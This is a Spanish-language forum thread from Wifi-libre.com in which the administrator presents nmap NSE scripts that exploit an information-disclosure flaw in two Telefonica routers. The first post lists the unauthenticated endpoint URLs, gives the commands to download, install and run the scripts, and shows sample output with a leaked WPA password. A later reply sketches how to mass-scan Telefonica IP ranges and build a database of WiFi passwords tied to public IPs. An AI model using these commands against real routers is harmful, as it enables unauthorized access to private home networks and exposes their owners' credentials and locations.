Explotando brecha de seguridad en dos routers de telefonica (Pagina 1) / Seguridad y Hacking / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 28-11-2015 13:57:17

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,056

Explotando brecha de seguridad en dos routers de telefonica

Presentación de dos scripts *.nse (para nmap) de DanyLabs contra dos modelos de routers puestos en servicio por Telefonica :
    1) El PDG-A4001N de ADB-Broadband
    2) El VG 8050 de Comtrend

Timo_1.jpg

¿Que tal hoy amig@ wifi-libertari@?
  Ayer hemos hablado de una brecha muy interesante en los routers vodafone para fibra ( Brecha severa en los nuevos routers "fibra" Vodafone (Huawei HG253 v2) )
  Podemos explotar esta brecha ( créditos vicendominguez) gracias a un script ( http-enum-vodafone-hua253s.nse )de DanyLab disponible en su rama GitHub
  Si os fijéis podéis ver que DanyLab nos propone dos scripts más en su rama :

  1. http-enum-telefonica-homestation.nse (para PDG-A4001N de ADB-Broadband)

  2. http-enum-telefonica-comtrend-vg-8050.nse (para VG 8050 de Comtrend)

Las tres brechas son muy similares : Permiten obtener sin permisos información critica, sobre todo la lave WPA de la red WiFi.
   El PDG-A4001N (eSSID por defecto de tipo WLAN_XXXX) es un modelo que telefónica ha empezado a usar por 2011.
Es un dispositivo que conocemos bien ya que tiene varios PIN WPS genéricos y fue de los primeros modelos soportados por WPSPIN.
   El VG 8050 (eSSID por defecto MOVISTAR_XXXX) aparece en el paisaje wifi español un poco más tarde, alrededor de 2013.
También conocido por ser fácilmente atacable con su PIN genérico
Vista de la interfaz incriminada con su PIN genérico

timo_2.jpg

  En los tres dispositivos la vulnerabilidad se situá al nivel de la gestión del certificado de autenticidad de los coockies.
  Podemos acceder a algunas paginas de configuración del router gracias a coockies no autenticados y sin tener los credenciales.

  En el  PDG-A4001N podemos así acceder a :

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

  Usando el script de DanyLab podremos conseguir fácilmente la información siguiente :

nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-homestation:
|   SSID: WLAN_HOME
|   Cipher Algorithm: WEP
|   Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X

  Con el VG 8050 podemos acceder a las mimas paginas...

http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx

  Y podremos usar el script de DanyLab para obtener el bSSID, el eSSID, la llave WPA (y hasta la mac de los clientes conectados a la red WiFI) 

nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x

Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT    STATE SERVICE
80/tcp  open  http
| http-enum-telefonica-comtrend-vg-8050:
|   SSID: MOVISTAR_XXX
|   Cipher Algorithm: WPA
|   Password WEP:
|   Password WPA: gTU3NkXE44RYjuM2RrxM
|   Password WPA2:
|   Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
Como usar un script *.nse (Nmap Scripting Engine)

  Nuestro nmap es una herramienta fabulosa. Una de sus fuerzas es la posibilidad de crear y lanzar scripts con nuestros comandos nmap.
Estos script se distinguen por su extensión de tipo *.nse
  Vamos a ver como hacemos para usar uno de estos scripts.
Lo primero que tenemos que hacer es localizar el directorio dónde nmap guarda los scripts *.nse (nmap lleva muchos de estos scripts por defecto que son muy interesantes)

locate *.nse

En mi caso es en /usr/local/share/nmap/scripts/
Luego simplemente copiamos el script que queremos añadir en este directorio

  Ejemplo (script comtrend) :
Descargamos los scripts de Dany

svn co https://github.com/DaniLabs/scripts-nse

Copiamos el script (comtrend) en el directorio

sudo cp -r  scripts-nse/trunk/http-enum-telefonica-comtrend-vg-8050.nse  /usr/local/share/nmap/scripts

A la hora de redactar nuestra linea de comando nmap invocamos el script con el parámetro "--script="
Por ejemplo; para ver la ayuda sobre el script :

sudo nmap --script-help http-enum-telefonica-comtrend-vg-8050.nse

Y obtenemos información sobre el script :

Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-28 13:56 CET

http-enum-telefonica-comtrend-vg-8050
Categories: default safe
https://nmap.org/nsedoc/scripts/http-enum-telefonica-comtrend-vg-8050.html
  Script to detect disclosure information vulnerability from Comtrend VG 8050 Telefonica Spain

Fácil ¿No?
Una vez que habéis copiado el script en el directorio nmap dedicado podéis usar los comandos dados por DanyLab,
¡Buena pesca! tongue lol

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#2 29-11-2015 19:54:42

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 154

Re: Explotando brecha de seguridad en dos routers de telefonica

Tiene buena pinta, aunque no acabo de entender cuales son los pasos para realizar el ataque. Estaría bien algún video  ilustrativo de esos que sabes hacer smile

Desconectado

#3 30-11-2015 16:08:26

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,056

Re: Explotando brecha de seguridad en dos routers de telefonica

Buenas Atim.
Desgraciadamente no tengo ninguno de estos routers para hacer un vídeo o un tema guapo con imágenes de un ataque. hmm
Suponiendo que tienes uno, lo que tendrías que hacer es

  1. Notar la IP publica.

  2. Lanzas el comando nmap sobre la IP publica del punto de acceso y invocando el script

  3. El script se encarga de crear el coockie y de recoger gracias a el la información disponible en las paginas

Si nos ponemos en la piel de un "chico malote", lo que haría sería

  1. lanzar un primer escaneo básico sobre puertos 80 y 443 en rangos de IP que pertenecen a telefónica

  2. Lanzar el script contra las IP recogidas en el primer escaneo

Y nada... se hace asi una base de datos con nombre de la red, bSSID y passWPA + IP.
Si usas uno de estos routers, pues no mola saber que uno puede conocer el pass de tu red wifi y localizarla con su IP publica.
No es la cosa mas peligrosa del mundo porque tiene que mover su culo hasta tu casa para explotar la brecha y perjudicarte (mas allá del hecho de que conoce tu pass)
Es un mal menor : el "exploit" se focaliza en obtener información.
No sabemos si no se podría acceder y/o configurar otras paginas de un modo similar...Para hacer cosas mas malignas como habilitar SSH para tomar el control remotamente...

Desconectado

#4 01-12-2015 15:02:09

atim
Very Important Usuario

Registrado: 15-03-2015
Mensajes: 154

Re: Explotando brecha de seguridad en dos routers de telefonica

Muchas gracias por la explicación kcdtv.

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

Temas similares

Tema Respuestas Vistas Ultimo mensaje
Belgrano Windalo por Patcher
2 34 Hoy 05:39:22 por Fisgon
9 80 Hoy 00:45:10 por dynyly
11 176 Hoy 00:44:17 por Patcher
Hola! por Ike
3 33 Ayer 22:36:24 por Flashed
0 14 Ayer 19:25:20 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: Ike
Usuarios registrados conectados: 0
Invitados conectados: 5

Estadisticas de los foros

Número total de usuarios registrados: 356
Número total de temas: 618
Número total de mensajes: 4,234

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20